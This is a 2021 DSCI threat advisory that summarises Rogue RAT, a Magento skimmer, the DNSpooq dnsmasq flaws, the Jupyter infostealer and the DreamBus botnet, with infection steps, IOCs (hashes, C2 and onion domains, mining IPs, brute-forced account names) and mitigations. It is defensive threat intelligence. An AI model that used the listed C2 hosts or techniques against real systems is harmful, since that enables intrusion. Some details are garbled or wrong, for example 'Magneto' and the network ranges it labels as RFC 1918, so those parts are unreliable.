dsci threat intelligence and research initiative

1 TI&R © Data Security Council of India 2021 Threat Advisory

`

Threat Identification – DTINRS002

DSCI

THREAT INTELLIGENCE

AND RESEARCH INITIATIVE

THREAT ADVISORY

January- February 2021


Recent Threats

• Rogue RAT Android Malware

• Magneto Website

• DNSmasq Software

• Jupyter Trojan

• DreamBus Malware


Threat Identification: Rogue RAT Android Malware

Synopsis:

Rogue RAT (Remote Access Trojan) is a combination of two existing malware. Can be handled

by anyone even the unskilled cybercriminals the ability to attack and control the infected

device using this Trojan.

Execution and Propagation:

Step 1: Attacker tries to download the malware using social engineering or phishing link which can be

installed to infect the device once user clicks on the downloaded link.

Step 2: Once the malware is installed, it hides its icons and presence on the device.

Step 3: Trojan verifies whether its real system or virtual one. Rogue RAT has the ability to detect a

virtual environment and stop its functioning if it's not a real system.

Step 4: Next, it repeatedly asks for various permissions. Additionally, detection of any malicious

activity is difficult as it silently conducts all the background operations.

Step 5: The malware registers itself as an admin and if a legitimate user tries to remove the admin

permission, it displays a warning stating, “all data will be deleted or wiped completely.”

Fig.1. Malware hides its icon

https://research.checkpoint.com/2021/going-rogue-a-mastermind-behind-android-malware-

returns-with-a-new-rat/

https://research.checkpoint.com/2021/going-rogue-a-mastermind-behind-android-malware-returns-with-a-new-rat/



These are some functions that are being used by Malware to track user's activity.

• TYPE_VIEW_TEXT_CHANGED

• TYPE_VIEW_FOCUSED

• TYPE_VIEW_CLICKED

Malware Characteristics:

• Rogue malware customizes all application notifications based upon the attacker's

instructions.

• It can record and listen to all the calls going in and out from the affected devices

• User actions can be recorded and collected data can be uploaded to command-and-

control server by the malware.

• It’s possible to sell collected information and data over dark web or to other

cybercriminals.

Following images indicate all above actions:

Fig 2: Rogue uploads data to C&C server

https://research.checkpoint.com/2021/going-rogue-a-mastermind-behind-android-malware-returns-with-

a-new-rat/




Fig 3: Rogue Malware Saves notification


a-new-rat/

Fig 4: All calls listen and recorded by attacker


a-new-rat/






IOC / Signature:

HASH SHA256

af89e25c4add8bc5a5d5cd1a16479ecd8f40577766d8ea8e42eb6bcae7d3ba9d

b93ba6614762120f200efdee98ba2f5f3f3f55f152279c70422d2014f770cf8e

bcd53e2e363daf5eb719c0892d49d15261189fe8711adc9ad40fcbe646956622

c2893c0cdb3e67f3052fe3f819f03f5d52610d0904dad11aa353db202ead6c00

caa38f6ae2969e885757ff0cfce69b7981d4c115740f12cd18b4088b47a97dee

Host Indicators

Shortcut name

(visible to user in

menu)

Application name (visible in

application properties)

Apple protect Se.spitfire.appleprotect.it

Axles Com.absolutelycold.axgle

Buzz Com.throughtcrime.securesms

Google play service Com.demo.testing

Idea security Com.demo.testing

Security Sc.phoneix.securit

Security Com.demo.testing

• https [:]//bald-panel[.]Firebase [.]com

• https [:]//hawkshaw-cae48[.]firebase [.]com

• https [:]//spitfire panel[.]firebase[.]com

• Https [:]//phoenix-panel[.]Firebase [.]Com

Recommendations:

• Use Mobile threat defense and anti-malware protection

• Do not click on any unknown links and attachments

• Conduct regular device scans

• Manage device permissions carefully; do not allow extra permissions to gallery,

contacts, and other sensitive information.

• Always manage your admin access with strong MFA

• Monitor activity of mobile devices regularly


Threat Identification: Magneto PHP Injection Loads JavaScript

Skimmer

Synopsis:

Magneto is an e-commerce website used by various B2C segment vendors which has a

vulnerability to steal information.


Step 1: Malware penetrates the system using social engineering or phishing attack. Once the

attack is successful it performs the following functions:

Initially, the malware checks two conditions. However, if any one of the below mentioned

conditions are satisfied, the malware processes itself further.

1. If the user account is non-admin

2. If the user has not logged in or is on the logout page

It firstly verifies Uri's request by the user by checking URI for the text string: "/one-step

checkout/index. To check whether the user is logged out. Skimmer verifies user’s non-admin

account only if the viewer does not have an admin HTML cookie.

Fig 5: Cookie and Encoded URL

https://blog.sucuri.net/2021/01/magento-php-injection-loads-javascript-skimmer.html



Step 2: To go undetected, this skimmer uses PHP function file_get_contents () which is

encrypted bas64 in URL to hide what content its downloading.

Recommendations:

• Use a web application firewall

• Website hardening to prevent penetration of malware

• Patch any vulnerabilities present in the website

• Keep PHP version updated

Threat Identification: Vulnerabilities known as DNSpooq affecting a

DNSmasq Software

Synopsis:

DNSmasq, is an open-source DNS forwarding software is commonly used within the industry.

This is a very popular software used in various mobiles, routers and IoT devices from android

phones to routers and many more. DNSpooq vulnerability is mainly divided into two sections

i.e.

Fig 6:


https://www.php.net/manual/en/function.file-get-contents.php



1. DNS cache poising

2. BOF Buffer overflow

Cache poisoning makes the user presume that a legitimate site is being browsed, however, in

reality, attacker takes over the device completely which can further lead to another harmful

attack if chained with other successful attacks.

As shown in figure representation of memory, malicious codes can be executed by filling the stack segment with unnecessary data and after that. As we are aware there is a limited storage in any embedded or IoT devices, thus, this vulnerability can be used by attacker to exploit the device. Need to reconfigure a secure design and input sanitization is recommended as this vulnerability lies in protocol. These two vulnerabilities have seven different exploitable sub-weaknesses.

Fig 7: DNS Cache Poisoning

Fig 8: Buffer Image Representation


CVE-2020-25687, CVE-2020-25683, CVE-2020-25682, CVE-2020-25681

CVE-2020-25684 CVE-2020-25685 CVE-2020-25686


Step 1: According to Shodan there are almost 1.2 billion devices exposed to internet. Attacker

uses Shodan to list those devices and check whether the current version of device using

DNSmasq is 2.83 or below.

Step 2: Attacker can launch an attack against any vulnerable device using above discussed

vulnerabilities.

Step3: Attacker then gains access to an organization or causes disruption, ransomware etc by

launching multiple successful attacks.

Recommendations:

• Using DNS Sec and cryptography is the best way to secure network communication

• Monitor your networks regularly

• Update DNSmasq software's version to 2.83 or above

Threat Identification: Jupyter Trojan

Synopsis:

A .NET-based info stealer Trojan, Jupyter steals critical information from the system. Although, Jupyter info stealer primarily targets browsers like Chromium, Firefox, and Chrome browser data, it is capable of backdoor functionalities.

There are various info stealer Trojans present over dark web with varying behavior such as a Banking Trojan (Trick bot) which is a very lightweight program.


Infection and Propagation:

Step1: Infection begins with downloading the zipped file which, containing the installer and

executable files, that pretends to be a legitimate file and performs the following functions

using a standard Process Hollowing technique:

1. Drop and execute a script

2. Drop and Inject a shell code into a Microsoft legitimate process, "msinfo32.exe,"

Step 2: When executing the files, resultant drops two files in temp directory i.e., a power

shell script which reads the second encrypted file and loads for the next stage as shown in

Fig 9.

Step 3: Power shell script calls functions and converts encoded URL to visit from browser.

Additionally, it uses the PoshC2 persistence method in newer versions of the installer and

creates an .INK file and places it directly in the Windows start-up folder for persistence.

Fig 9: Power Shell Scripts

Fig 10: https://blog.morphisec.com/jupyter-infostealer-backdoor-introduction

https://blog.morphisec.com/jupyter-infostealer-backdoor-introduction


Step 4: Data is stolen from the browser as shown in the following screenshot using

chromium-browser.

Signature/ IoCs:

SHA-1

• SHA-1: 26AF2E85B0A50BF2352D46350744D4997448E51D • SHA-1: 8133304181d209cb302fbcdbf3965b0b5c7fa20c • SHA-1: f76e293d627c55eca18ce96e587fb8c6e37d8206 • SHA-1: d5a6ebdd65398f0a3591900192992220df49b03c

Recommendations:

• Do not download any untested attachments • Block the installation of programs from any unknown sources • Download from relevant and trusted sources • Monitor resource utilization continuously

Fig 11: Stolen Data from Browser




Threat Identification: DreamBus Malware

Synopsis:

DreamBus is a malware designed to infect the system and enable the attacker to control the infected system by using resources of compromised machines to mine crypto currencies.

Infection and Propagation:

Step 1: Attacker attempts to install malware in the system using phishing or any social

engineering technique.

DreamBus malware is based on ELF binary files which are responsible for setting up the environment. Figure 12 shows an example of the UPX header replaced with the value 0x3330dddf.

Step 2: This step involves working with the scanning module that looks for a private network which is not connected to the internet and is based on RFC 1918:

• [1-3].0.0.0/8

• 5.0.0.0/8

• 8.0.0.0/8

• [12-15].0.0.0/8

• 18.0.0.0/8

• 20.0.0.0/8

• [23-24].0.0.0/8

• 27.0.0.0/8

Fig 12: Modified UPX header value

https://www.zscaler.com/blogs/security-research/dreambus-botnet-technical-analysis



• 31.0.0.0/8

Step 3: DreamBus spreader module is used that has seven shell scripts responsible for the next course of actions and further runs several commands. It uses c URL commands to communicate with TOR through HTTP.

Function x () creates cron job and makes the system persistence to be accessible in future.

• $HOME/.systems-service

• /opt/systems-service

• /etc/cron.d/0systemd-service

The cron job then executes a shell script that downloads an updated copy of the Dream Bus malware over TOR.

Following are TOR domains which sockz () function tries to connect to a hard coded TOR:

• tor2web.in

• tor2web.it

• Onion. Foundation

• onion.com.de

• onion.sh

• tor2web.su

Step 4: It involves DreamBus SSH brute force module where shell script downloads tar file in the following folder and once content is decompress edit displays the three files as shown in Fig 13.

/tmp/.X11-unix/sshd

This module is also responsible for downloading script, listing username and passwords, and scanning services for the SSH user for brute-force attack. Firstly, the module checks whether the SSH service is running or not through the following program that was downloaded earlier through a network.

Filename Description

ss The tool pnscan used by DreamBus to scan for SSH server on the local network


ssh The tool sshpass brute-forcing SSH password

PW List of passwords to use for SSH bruteforce

The PW file contains a list of approximately 2,711 passwords that are used for the SSH brute force attack and passed to the ssh pass utility.

Step 5: The most popular database software, PostgreSQL, is used during Step 5 which is abused by the Dream Bus malware.

PostgreSQL mainly enumerates user and searches for any databases to brute-force using hard

coded username and passwords to gain access. The module will conduct a search for

PostgreSQL servers running on port 5432 and will brute force the following accounts:

• Postgres

• Red mine

• root

• admin

• rdsdb

• clouder-scm

• dbadmin

• stolon

• odoo

Step 6: Automation platform tools, such as ansible, knife, salt and pssh with a Base64 encoded string, containing shell commands are used to infect remote systems.

Step7: It involves script to download XMRig module mine Monero, through the/CPU command. XMRig module is hard coded script which is compiled regularly with the most recent version.

Fig 13: Files from Brute Force Module


IOC / Sign: HASH SHA 256 E78fc101133d1803cd462b68058c5c238f56b1fe9416e5997cfe7d44947092a2 2556c8cedd6f0ff7d16be9093bbfd0e86ede3e47fab13dfeb8d3964f10b18ea4 0e726a4fff8efeff3fdd127bed6ed28d5f51ff2c4f1e40a267984f7edae8e7d3 636accbee3f2163945886fa8f68c74449eb3d54769a1747728197e7804339b91 Mining IP pool IP Addresses:

• 164.132.105.114

• 136.243.90.99

• 164.132.105.114

• 136.243.90.99

Fig 14: https://www.zscaler.com/blogs/security-research/dreambus-botnet-technical-

analysis




Network Indicators:

• Dreambusweduybcp. onion

• qsts2vqotnlh2h5xwa7fp3iopb7h7cngknjjo4f4sxhrwcqgughipxid.onion

• i62hmnztfpzwrhjg34m6ruxem5oe36nulzmxcgbdbkiaceubprkta7ad.onion

Host Indicators:

Following files and folders can be found on compromised systems:

• Systemd-service.sh

• 0systemd-service

• /tmp/.X11-unix/sshd

Recommendations:

• Do not download any irrelevant and untrusted attachments

• Block the installation of programs from any unknown sources

• Monitor resource utilization continuously

dsci threat intelligence and research initiative

Documents